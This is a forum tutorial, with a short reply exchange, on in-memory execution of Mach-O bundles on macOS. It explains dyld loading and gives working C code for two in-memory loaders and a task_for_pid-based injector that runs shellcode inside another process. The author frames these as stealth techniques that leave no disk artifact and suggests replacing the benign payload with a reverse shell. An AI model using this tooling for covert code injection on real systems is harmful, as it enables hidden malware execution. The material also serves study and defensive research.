Executing Mach-Os In-Memory

0xf00I · December 18, 2024, 9:51pm

In-memory execution on macOS: yes, it is a thing too. Some time ago, I read a post by Patrick Wardle about one of the Lazarus Group implants using remote downloads and in-memory execution. I decided to revisit this technique.

The term in-memory execution means running executable code directly from memory without first writing it to disk as a file. As with any operating system, the trick is in dynamic loading. A process image in memory differs from its image on disk, so you cannot just copy a file into memory and jump to it. Instead, you would use APIs like NSCreateObjectFileImageFromMemory and NSLinkModule, which handle the creation of the in-memory mapping and the linking. Both have been deprecated since macOS 10.5.

I found this example, bundle-memory-load/main.c, which basically loads a binary or bundle into a region of memory.

But before we cover it, we need to know what a Mach-O file is. I’ll follow this Reference, so check it out. Mach-O is the standard file format for executables, object code, shared libraries, and core dumps on macOS and iOS. It is a highly structured binary format that stores the instructions and data needed to run code, and it comes in several types depending on how the code is meant to be used:

Executable: contains the code and data for running a program.
Dynamic Library (.dylib): shared code usable by several programs.
Bundle (.bundle): code that can be loaded dynamically at runtime, as in this tutorial.

The Mach-O format consists of a header, load commands, and segments. Together they specify what kind of file this is, how memory is laid out, and what linkage information the loader needs at runtime. Each segment may contain executable code, initialized data, or metadata. The dynamic linker, dyld, uses this information to map the file into memory, resolve symbols, and execute it.

Each segment holds a different part of the file. The two you will meet most often are the __TEXT segment, which holds the executable code, and the __DATA segment, which holds global variables.

~$ otool -hV /Applications/Signal.app/Contents/MacOS/Signal
/Applications/Signal.app/Contents/MacOS/Signal:
Mach header
      magic  cputype cpusubtype  caps    filetype ncmds sizeofcmds      flags
MH_MAGIC_64   X86_64        ALL LIB64     EXECUTE    16       1544   NOUNDEFS DYLDLINK TWOLEVEL PIE

~$  otool -l /Applications/Signal.app/Contents/MacOS/Signal
/Applications/Signal.app/Contents/MacOS/Signal:

Load command 0
      cmd LC_SEGMENT_64
  cmdsize 72
  segname __PAGEZERO
   vmaddr 0x0000000000000000
   vmsize 0x0000000100000000
  fileoff 0
 filesize 0
  maxprot 0x00000000
 initprot 0x00000000
   nsects 0
    flags 0x0
...

Segments are important for understanding exactly how a binary is loaded, as well as how it behaves once it is in memory.

The type most relevant to us is the bundle. A bundle is a dynamically loadable image that can be loaded at runtime, and dyld has the job of linking and running it. When dyld processes the Mach-O header and load commands, it maps the respective segments into memory, sets the proper permissions (READ, EXECUTE, or READ/WRITE), and resolves all required symbols before passing control to the program’s entry point.

Now let’s discuss in a little more detail what dyld does. dyld is responsible for loading Mach-O files into memory and resolving their dependencies at runtime. It does this by parsing the file’s load commands, which tell dyld what segments need to be mapped into memory, what libraries need to be linked, and what symbols need to be resolved. This is precisely what happens when an executable or bundle is loaded from disk.

But for complete in-memory code execution, without spilling any payloads on disk, we have to implement what gets done by dyld. Instead of relying on dyld to load the file off disk, we can manually load the Mach-O bundle into memory and do everything dyld normally does. That includes mapping the segments into memory, setting permissions, and resolving symbols.

Here’s a post by Adam Chester on how to patch dyld to load Mach-O bundles completely in memory, which means we never have to touch the disk. It’s a cool technique that leaves no artifact on disk, which makes it pretty useful for stealth.

When dyld loads a Mach-O file, it reads the header to understand the general layout of the file and then processes the load commands, working out how to map in the different segments. These segments are then mapped with appropriate permissions; for example, the __TEXT segment is normally marked executable, while the __DATA segment is marked as writable. Finally, dyld performs the symbol resolution and transfers control to the entry point, executing the code.

We can load and execute Mach-O files completely in memory by emulating this process, without the need to write anything to disk. That’s exactly what our example does: it opens a Mach-O bundle, maps it into memory, creates an object file image, links the module, resolves the symbol for the function we want to execute, and finally calls that function. (I’m repeating myself here.)

Now that we understand the inner workings of Mach-O files and how dyld processes them, let’s move forward with actual examples that tie together everything we’ve discussed. The goal is to demonstrate how we can emulate dyld’s behavior in loading and executing Mach-O bundles entirely in memory, avoiding the need to write payloads to disk.

Check out this piece of code that loads a Mach-O bundle into memory, maps the necessary segments, resolves symbols, and then calls a function from the bundle. In this example, we assume that the Mach-O bundle contains a function called _execute, which we will invoke after loading the bundle in memory.

// MachODynamicLoader.c
// Dynamically loads and executes a Mach-O bundle (_execute symbol).
// Uses dyld APIs to memory-map, link, resolve, and call.

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/dyld.h>

int main() {
    struct stat sb; void *code = NULL;
    NSObjectFileImage img = NULL; NSModule mdl = NULL; NSSymbol sym = NULL;
    void (*exec_fn)() = NULL;

    int fd = open("test.bundle", O_RDONLY); // open file
    if (fd < 0 || fstat(fd, &sb) < 0) return 1;

    // map Mach-O file
    code = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0); close(fd);
    if (code == MAP_FAILED) return 1;

    // create object file image
    if (NSCreateObjectFileImageFromMemory(code, sb.st_size, &img) != NSObjectFileImageSuccess)
        return munmap(code, sb.st_size), 1;

    // link module
    mdl = NSLinkModule(img, "module", NSLINKMODULE_OPTION_NONE);
    if (!mdl) return NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // resolve "_execute" symbol
    sym = NSLookupSymbolInModule(mdl, "_execute");
    if (!sym) return NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE), 
                  NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // call resolved symbol
    if ((exec_fn = NSAddressOfSymbol(sym))) exec_fn();

    // cleanup
    NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE);
    NSDestroyObjectFileImage(img);
    return munmap(code, sb.st_size), 0;
}

Here, we’ve handed dyld a Mach-O image that already sits in memory instead of a path on disk. Ordinarily, dyld opens the Mach-O from disk, maps the segments into memory, resolves symbols, and transfers control to the executable code. With NSCreateObjectFileImageFromMemory and NSLinkModule, dyld still does the linking and symbol resolution, but it works from our buffer. In this example the buffer comes from mmap on test.bundle, but it could just as well have been filled from the network.

However, remember that these functions have been deprecated since macOS 10.5. They still ship for compatibility, but Apple no longer recommends them, and their behaviour on current systems is not guaranteed to match older releases. As far as I can tell, newer versions of dyld may write the buffer out to a temporary file and load it from there, which is what the dyld patching trick mentioned above works around. Code-signing enforcement and the hardened runtime can also get in the way of loading unsigned code.

Since macOS 10.5, dynamic loading via the dlopen family of functions has been the preferred approach: dlopen, dlsym, dlclose. This allows for dynamic loading at runtime, symbol resolution, and unloading of libraries. However, dlopen still expects a file on disk. For purely in-memory execution, we need to parse the Mach-O headers manually and set up memory regions with mmap, mimicking dyld’s operations.

Next, let’s expand our example with another method for in-memory loading that avoids the deprecated functions entirely:

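// MachOLoader.c
// Loads, resolves, and executes _execute from a Mach-O bundle.
// No relocations or imports are processed, so _execute must be
// position-independent and must not call anything outside the bundle.

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/loader.h>
#include <mach-o/nlist.h>

void load_macho(const char *path) {
    int fd = open(path, O_RDONLY); if (fd < 0) return;
    struct stat sb; if (fstat(fd, &sb) < 0) { close(fd); return; }
    char *codeAddr = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); close(fd);
    if (codeAddr == MAP_FAILED) return;

    struct mach_header_64 *header = (struct mach_header_64 *)codeAddr;
    if (header->magic != MH_MAGIC_64) { munmap(codeAddr, sb.st_size); return; }

    // first pass: find the address range covered by the segments
    uint64_t lowAddr = UINT64_MAX, highAddr = 0;
    struct load_command *loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *segCmd = (struct segment_command_64 *)loadCmd;
            if (strncmp(segCmd->segname, SEG_PAGEZERO, 16) != 0) { // __PAGEZERO is never backed by memory
                if (segCmd->vmaddr < lowAddr) lowAddr = segCmd->vmaddr;
                if (segCmd->vmaddr + segCmd->vmsize > highAddr) highAddr = segCmd->vmaddr + segCmd->vmsize;
            }
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }
    if (highAddr <= lowAddr) { munmap(codeAddr, sb.st_size); return; }

    // reserve one region for the whole image and let the kernel pick the base;
    // RWX keeps the example short (Apple silicon would additionally need MAP_JIT)
    size_t imageSize = (size_t)(highAddr - lowAddr);
    char *base = mmap(NULL, imageSize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) { munmap(codeAddr, sb.st_size); return; }

    // second pass: copy each segment to its slot and remember the symbol table
    struct symtab_command *symTabCmd = NULL; loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *segCmd = (struct segment_command_64 *)loadCmd;
            if (segCmd->filesize > 0)
                memcpy(base + (segCmd->vmaddr - lowAddr), codeAddr + segCmd->fileoff, segCmd->filesize);
        } else if (loadCmd->cmd == LC_SYMTAB) {
            symTabCmd = (struct symtab_command *)loadCmd;
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    if (symTabCmd) {
        struct nlist_64 *symTbl = (struct nlist_64 *)(codeAddr + symTabCmd->symoff);
        char *strTbl = codeAddr + symTabCmd->stroff;
        for (uint32_t i = 0; i < symTabCmd->nsyms; i++) {
            // only symbols defined in a section have a usable address in n_value
            if ((symTbl[i].n_type & N_TYPE) == N_SECT &&
                strcmp(strTbl + symTbl[i].n_un.n_strx, "_execute") == 0) {
                ((void (*)(void))(base + (symTbl[i].n_value - lowAddr)))();
                break;
            }
        }
    }
    munmap(base, imageSize);
    munmap(codeAddr, sb.st_size);
}

int main() { load_macho("test.bundle"); return 0; }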

The logic is: we create a function called load_macho that takes the path to the Mach-O file. It opens the file, reads its size, and memory-maps it into our process’s address space. Then we check that the header is indeed a 64-bit Mach-O header, and we iterate through the load commands to copy all the needed segments into executable memory.

Finally, we handle symbol resolution manually by searching the symbol table for _execute and calling it if found. Keep in mind that this loader does not process relocations or bind imported symbols, so it only works when _execute is position-independent and calls nothing outside the bundle. The example reads test.bundle from disk for convenience, but the same steps apply to a buffer that arrived some other way, which is how in-memory execution can take place without writing a payload to disk.

As an alternative approach, we can perform in-memory execution by injecting and executing shellcode directly. For this, you can refer back to the earlier part where we discussed writing 64-bit assembly shellcode for macOS. That shellcode can then be converted into machine code and staged in memory using techniques like mmap and mprotect.

Here’s how you can showcase a simple stager (dropper) that executes a small payload (shellcode) whose job is to download or pull another payload into memory. The downloaded payload is then executed directly from memory using the Mach-O techniques we discussed earlier.

We simulate downloading the payload into memory, but instead of fetching it over the network, we use hardcoded shellcode. It is just a small snippet of machine code that prints “Hello World”. We use mmap() to allocate memory with READ/WRITE permissions, then copy the shellcode into the allocated space.

Next, we use mprotect() to change the memory permissions to READ/EXECUTE, making it executable. Finally, run_payload() executes the shellcode directly from memory by casting the memory pointer to a function pointer and calling it.

Virtual Memory Map of process 1195 (PayloadStager)
Output report format:  2.4  -- 64-bit process
VM page size:  4096 bytes

==== Non-writable regions for process 1195
REGION TYPE                    START - END         [ VSIZE  RSDNT  DIRTY   SWAP] PRT/MAX SHRMOD PURGE    REGION DETAIL
__TEXT                      105899000-10589d000    [   16K    16K     0K     0K] r-x/r-x SM=COW          /Users/USER/*/PayloadStager
__DATA_CONST                10589d000-1058a1000    [   16K    16K     4K     0K] r--/rw- SM=COW          /Users/USER/*/PayloadStager
__LINKEDIT                  1058a5000-1058a6000    [    4K     4K     0K     0K] r--/r-- SM=COW          /Users/USER/*/PayloadStager
__LINKEDIT                  1058a6000-1058a9000    [   12K     0K     0K     0K] r--/r-- SM=NUL          /Users/USER/*/PayloadStager
dyld private memory         1058a9000-1059a9000    [ 1024K    12K    12K     0K] r--/rwx SM=PRV
shared memory               1059ab000-1059ad000    [    8K     8K     8K     0K] r--/r-- SM=SHM
MALLOC metadata             1059ad000-1059ae000    [    4K     4K     4K     0K] r--/rwx SM=ZER          
MALLOC guard page           1059b2000-1059b3000    [    4K     0K     0K     0K] ---/rwx SM=ZER
MALLOC guard page           1059b7000-1059b8000    [    4K     0K     0K     0K] ---/rwx SM=ZER
MALLOC guard page           1059b8000-1059b9000    [    4K     0K     0K     0K] ---/rwx SM=NUL
MALLOC guard page           1059bd000-1059be000    [    4K     0K     0K     0K] ---/rwx SM=NUL
MALLOC metadata             1059be000-1059bf000    [    4K     4K     4K     0K] r--/rwx SM=PRV
MALLOC metadata             1059bf000-1059c0000    [    4K     4K     4K     0K] r--/rwx SM=ZER

As expected, the executable code resides in the __TEXT segment, which has r-x permissions. This indicates that the memory is readable and executable, but not writable, as is typical for code segments.

Note the PRT/MAX column: it shows the current protection followed by the maximum protection the region is allowed to have. The dyld private memory region is r--/rwx, meaning it is read-only right now, but its maximum protection permits both write and execute, so it can be switched between writable and executable later. The SM=PRV attribute marks it as private to the process. That is consistent with what you would expect when using mmap for shellcode execution, as shown in this code.

If we follow this closely, we can see that the mmap system call allocates memory at address 0x10EA93000 with an initial set of permissions. PROT_READ | PROT_WRITE is 0x3 (0x1 | 0x2), which allows reading and writing to the allocated memory.

The mprotect system call is then used to modify the memory permissions. In this case, the memory at address 0x10EA95000 is changed from writable to executable.

Finally, the 0x5 indicates PROT_READ | PROT_EXEC (0x1 | 0x4): write permission is dropped and execute permission is granted, which allows the payload to run from this memory region.

This is of course the most basic, naive way. If we want to play a little, we can introduce a payload into the memory of another process using the Mach VM API, following the same principles. You can use task_for_pid to get the target’s task port, but make sure you have the privileges.

To give you an idea: allocate some memory, drop the shellcode in, make it executable, and let it run. First, we reserve memory in the target process using mach_vm_allocate. We want a chunk of space that can hold our shellcode. This is where our executable code will live. Once we have the space, we write the shellcode into that memory region with mach_vm_write. At this stage, make sure that the shellcode is properly laid out in memory for execution.

Next, we set the memory protections with mach_vm_protect, making the region executable. This allows our shellcode to run without hitting any access violations. Now, with the shellcode in place and ready to execute, we need to create a thread within the target process. This can be done with thread_create_running, pointing the program counter to our shellcode’s address and setting the stack pointer appropriately.

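// MachInjector.c - Injects shellcode into a target process and runs it

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <mach/mach.h>
#include <mach/mach_error.h>
#include <mach/mach_vm.h>

#define SHELLCODE_SIZE 128                  // size of the region reserved for the code
#define STACK_SIZE     (SHELLCODE_SIZE * 4) // size of the new thread's stack

unsigned char shellcode[] = {
    0x90, 0x90, 0x90,             // nop padding
    0x90, 0xeb, 0x1e,             // nop; jmp +0x1e (to the call below)
    0x5e,                         // pop    rsi (address of the string)
    0xb8, 0x04, 0x00, 0x00, 0x02, // mov    eax, 0x2000004 (write)
    0xbf, 0x01, 0x00, 0x00, 0x00, // mov    edi, 1 (stdout)
    0xba, 0x0e, 0x00, 0x00, 0x00, // mov    edx, 0x0e (string length)
    0x0f, 0x05,                   // syscall
    0xb8, 0x01, 0x00, 0x00, 0x02, // mov    eax, 0x2000001 (exit)
    0xbf, 0x00, 0x00, 0x00, 0x00, // mov    edi, 0 (exit status)
    0x0f, 0x05,                   // syscall
    0xe8, 0xdd, 0xff, 0xff, 0xff, // call   back to pop rsi, pushing the string address
    0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f, 
    0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a   // "Hello World!\r\n"
};

kern_return_t allocate_stuff(task_t task, mach_vm_address_t *shellcode_addr, mach_vm_address_t *stack_addr) {
    kern_return_t kr;
    // reserve space for the code in the target, copy it in, then make it r-x
    kr = mach_vm_allocate(task, shellcode_addr, SHELLCODE_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) return kr;
    // write only the bytes we actually have, not the whole reserved region
    kr = mach_vm_write(task, *shellcode_addr, (vm_offset_t)shellcode, (mach_msg_type_number_t)sizeof(shellcode));
    if (kr != KERN_SUCCESS) return kr;
    kr = mach_vm_protect(task, *shellcode_addr, SHELLCODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
    if (kr != KERN_SUCCESS) return kr;
    // separate read/write region for the new thread's stack
    return mach_vm_allocate(task, stack_addr, STACK_SIZE, VM_FLAGS_ANYWHERE);
}

int do_the_injection(pid_t pid) {
    task_t task;
    mach_vm_address_t shellcode_addr = 0, stack_addr = 0;
    kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
    if (kr != KERN_SUCCESS) { fprintf(stderr, "[-] task_for_pid: %s\n", mach_error_string(kr)); return -1; }

    kr = allocate_stuff(task, &shellcode_addr, &stack_addr);
    if (kr != KERN_SUCCESS) { fprintf(stderr, "[-] allocate_stuff: %s\n", mach_error_string(kr)); return -1; }

    // the new thread starts at the shellcode with rsp at the top of its stack
    x86_thread_state64_t state = {0};
    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = stack_addr + STACK_SIZE;

    thread_act_t thread;
    kr = thread_create_running(task, x86_THREAD_STATE64, (thread_state_t)&state, x86_THREAD_STATE64_COUNT, &thread);
    if (kr != KERN_SUCCESS) { fprintf(stderr, "[-] thread_create_running: %s\n", mach_error_string(kr)); return -1; }
    printf("[+] Injected into %d\n", pid);
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc < 2) { printf("Usage: %s <PID>\n", argv[0]); return -1; }
    return do_the_injection(atoi(argv[1])) == 0 ? 0 : 1;
}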

Instead of printing “Hello World!”, you could change the shellcode to spawn a shell or execute a reverse shell. Regardless of what the shellcode does, the flow remains similar: allocate memory, write the code, make it executable, set up the environment, and then execute it.

r 5294
Process 5301 launched: '/Users/i/src/exec' (x86_64)
[+] Injected into 5294
Process 5301 exited with status = 0 (0x00000000)

Hello World!                                                                     
[1]  + 5294 done

If you somehow jumped directly here: the code uses task_for_pid(), mach_vm_allocate(), and mach_vm_write(). Getting a task port for another process is restricted on macOS. In practice the caller needs root (or a debugger entitlement), and SIP blocks it against protected system processes regardless.

We launch the executable under lldb, the debugger, which confirms that the stack memory was also allocated, setting up the environment for our shellcode. You can debug it further from there.

This code demonstrates what we’ve covered so far, but here’s the catch: yep, it needs privileges to run. I’ll demo that in the example. If you’re thinking about injection, remember: regular users don’t get unrestricted access to core functionality. That’s by design.

If you’re serious about payload delivery or injection methods, take time to understand why these security measures exist. I recommend HackTricks’ macOS SIP and Bypass Techniques. It’s an excellent resource, check it out!

messede · December 19, 2024, 4:01pm

Wow, this is way harder on mac, huh. As a side note, THC’s skyper and I wrote a small bash utility to do something similar on Linux. You can read about it here: Bypassing noexec and executing arbitrary binaries.

0xf00I · December 19, 2024, 11:03pm

Yeah, mac has a lot of sec in place that makes code injection tough, unlike Linux where some of that stuff isn’t always on by default. Nice piece though, Thanks for sharing! It’s clean and clever. I mean, Overwriting Bash’s .text segment? That’s cold.
